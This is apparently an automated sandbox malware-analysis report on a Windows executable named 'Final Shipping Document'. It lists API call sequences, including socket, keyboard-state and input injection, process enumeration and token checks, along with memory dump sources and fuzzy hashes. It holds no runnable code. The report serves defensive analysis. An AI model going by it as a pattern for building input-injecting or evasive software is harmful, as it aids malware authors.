                                                            • FreeLibrary.KERNEL32 ref: 00BFD3E5
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                            • API String ID: 3013587201-2590602151
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                            • String ID:
                                                            • API String ID: 1998397398-0
                                                            • Opcode ID: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                            • Instruction ID: 3dcbd650a6fb7fb3c18eb68a0f105085f8bc764f38018dd97ad255148706a65d
                                                            • Opcode Fuzzy Hash: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                            • Instruction Fuzzy Hash: 39A160756183109FC700EF24D895A2AB7E5FF89710F04889DF99A9B362DB34EE01CB51
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C005F0
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C00608
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00C3CC40,000000FF,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C0062D
                                                            • _memcmp.LIBVCRUNTIME ref: 00C0064E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                            • Instruction ID: 1aeaeb202f84206570ec4f16acc8cf9e971c845cb64d31dd6bfec30c37236a31
                                                            • Opcode Fuzzy Hash: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                            • Instruction Fuzzy Hash: 23810B71A00109EFCB04DF94C984EEEB7B9FF89315F214598F516AB290DB71AE46CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 2a46faaedc54a38411e7337f5b327f0724fe85bd3828ef952ca9c123914b13fd
                                                            • Instruction ID: 536a211250805b93851b478e081f52b8e4bf64879f4f4193f9b3da644ac8e43d
                                                            • Opcode Fuzzy Hash: 2a46faaedc54a38411e7337f5b327f0724fe85bd3828ef952ca9c123914b13fd
                                                            • Instruction Fuzzy Hash: 79414D35600591ABDB216BBE8C85FBE3AF5EF41330F344AEAF419D63D2E73448419A61
                                                            APIs
                                                            • GetWindowRect.USER32(015EF770,?), ref: 00C362E2
                                                            • ScreenToClient.USER32(?,?), ref: 00C36315
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C36382
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                            • Instruction ID: 0f0185bf2da40dc6abbc294af2f74fd07e89d7b6f8174882c7899a928b97bfac
                                                            • Opcode Fuzzy Hash: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                            • Instruction Fuzzy Hash: EE514F75A10209EFCF10DF68D881AAE7BB5FF45360F148169F9659B2A0D731EE81CB50
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C21AFD
                                                            • WSAGetLastError.WSOCK32 ref: 00C21B0B
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C21B8A
                                                            • WSAGetLastError.WSOCK32 ref: 00C21B94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            • Opcode ID: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                            • Instruction ID: 34dd0ae74a8f99892c233a5d402ef92c9f7171b543b960df5dadaabfaa34b87f
                                                            • Opcode Fuzzy Hash: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                            • Instruction Fuzzy Hash: B341D274640210AFE720AF24D886F3A77E5AB45718F588488F92A9F7D3D772DD418B90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                            • Instruction ID: 35adf8395adfbae753172781870d14cb318d63e08712ae301621d858efa05b09
                                                            • Opcode Fuzzy Hash: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                            • Instruction Fuzzy Hash: B641C175A00644EFD724EF78C841FAABBE9EB88710F2145AFF551DB382E77199018B90
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C15783
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C157A9
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C157CE
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C157FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                            • Instruction ID: b250cff0909042054e6df5850588749d0bf2ec87618f41908877776d00bf9ab1
                                                            • Opcode Fuzzy Hash: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                            • Instruction Fuzzy Hash: BD415E35654610DFCB11EF15C495A5EBBE2EF9A320F18C488E85AAB362CB31FD40DB91
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BC6D71,00000000,00000000,00BC82D9,?,00BC82D9,?,00000001,00BC6D71,8BE85006,00000001,00BC82D9,00BC82D9), ref: 00BDD910
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDD999
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BDD9AB
                                                            • __freea.LIBCMT ref: 00BDD9B4
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 8db61c7b37ce4a3efc65817722979dab6c7b40e660ce3d0b2414e617d124f48c
                                                            • Instruction ID: f90f399dd50dc92f926e8b3551826f0670516352f292e06ccabe85aa61e65d2b
                                                            • Opcode Fuzzy Hash: 8db61c7b37ce4a3efc65817722979dab6c7b40e660ce3d0b2414e617d124f48c
                                                            • Instruction Fuzzy Hash: 5831E172A0020AABDF24DF65DC91EAEBBE5EB40310F0502A9FC44D7250EB3ADD50CB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00C35352
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C35375
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C35382
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C353A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                            • String ID:
                                                            • API String ID: 3340791633-0
                                                            • Opcode ID: 9270fd11a4480dcaec42430853869b337e780962ae3e870fe68d33c1d7bb493e
                                                            • Instruction ID: e3805db626329d3505db54a4df558407ea489a4160cb08ff5089d05a0885a2aa
                                                            • Opcode Fuzzy Hash: 9270fd11a4480dcaec42430853869b337e780962ae3e870fe68d33c1d7bb493e
                                                            • Instruction Fuzzy Hash: DF319634AB5A08EFEB749F14CC56FE977A5EB05390F584101FA21961F1C7B09E80DB51
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C0ABF1
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C0AC0D
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C0AC74
                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C0ACC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                            • Instruction ID: 28d9d03224f40d0905ffc0acb22d2c500be22e6c4f2514e72eaf62849703ca14
                                                            • Opcode Fuzzy Hash: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                            • Instruction Fuzzy Hash: FE310530A04718AFFF35CB65CC097FE7BA5AB89310F05431AE4A5961D1C3768B85D792
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 00C3769A
                                                            • GetWindowRect.USER32(?,?), ref: 00C37710
                                                            • PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                            • MessageBeep.USER32(00000000), ref: 00C3778C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                            • Instruction ID: 3f5ed2dc6eeb21ee92ee50e2c973ab54d037fbd76f82430fa11e0ad702b4c7f5
                                                            • Opcode Fuzzy Hash: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                            • Instruction Fuzzy Hash: F84182B4615214EFCB22CF58C895FAD77F5FB4A314F1942A8E9259B261C730A942CF90
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00C316EB
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • GetCaretPos.USER32(?), ref: 00C316FF
                                                            • ClientToScreen.USER32(00000000,?), ref: 00C3174C
                                                            • GetForegroundWindow.USER32 ref: 00C31752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                            • Instruction ID: ef2ccf1c91bd1a1bb693f3af0610933e0873e48032dae4aa165a6c4e6bf166d8
                                                            • Opcode Fuzzy Hash: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                            • Instruction Fuzzy Hash: FC315071E14149AFCB00EFA9C8C1DAEBBFDEF49304B5480AAE415E7211DB319E45CBA0
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C0D52F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                            • Instruction ID: 31cf465ecb248201f34f7cb62d760e17c47b97dc56c7b52888c4d7e03f5d1813
                                                            • Opcode Fuzzy Hash: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                            • Instruction Fuzzy Hash: AA31A2711083009FD300EF54CC81BAFBBF8EF9A394F14096DF592961A1EB719A45DBA2
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • GetCursorPos.USER32(?), ref: 00C39001
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BF7711,?,?,?,?,?), ref: 00C39016
                                                            • GetCursorPos.USER32(?), ref: 00C3905E
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BF7711,?,?,?), ref: 00C39094
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                            • Instruction ID: 9962df3fdd35bb8345cf50ff62c3762df20266b21077667121f7ba71c07ee0bb
                                                            • Opcode Fuzzy Hash: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                            • Instruction Fuzzy Hash: 3721D135610118EFCB298F98CC98FFE3BB9EF49360F044055F91557261C7719A90EB60
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00C3CB68), ref: 00C0D2FB
                                                            • GetLastError.KERNEL32 ref: 00C0D30A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C0D319
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3CB68), ref: 00C0D376
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                            • Instruction ID: 43b9421a44599c5b424f930376e7fd43dff73720295812526f56aa148edbe27f
                                                            • Opcode Fuzzy Hash: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                            • Instruction Fuzzy Hash: 0D219C705083019FC700DF68C8819AEB7F8AE5A764F104A5DF4AAD32E1DB31DA46CB93
                                                            APIs
                                                              • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                              • Part of subcall function 00C01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                              • Part of subcall function 00C01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                              • Part of subcall function 00C01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                              • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C015BE
                                                            • _memcmp.LIBVCRUNTIME ref: 00C015E1
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01617
                                                            • HeapFree.KERNEL32(00000000), ref: 00C0161E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                            • Instruction ID: 465ae430702812ac6423dd852e38a032985023cbd945223f83b3390c0184fcb5
                                                            • Opcode Fuzzy Hash: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                            • Instruction Fuzzy Hash: 5E216931E00108AFDB14DFA4C985BEEB7B8EF44354F084459E851AB281E731AA45DBA0
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00C3280A
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C32824
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C32832
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C32840
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                            • Instruction ID: f6943ed6cb8cb8e74753b45defa50bdd807a799a031c1af2f5fda361df7a4a13
                                                            • Opcode Fuzzy Hash: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                            • Instruction Fuzzy Hash: 7421D332228111AFDB149B24C895FAA7B95FF46324F148158F4268B6E2C771FD82C791
                                                            APIs
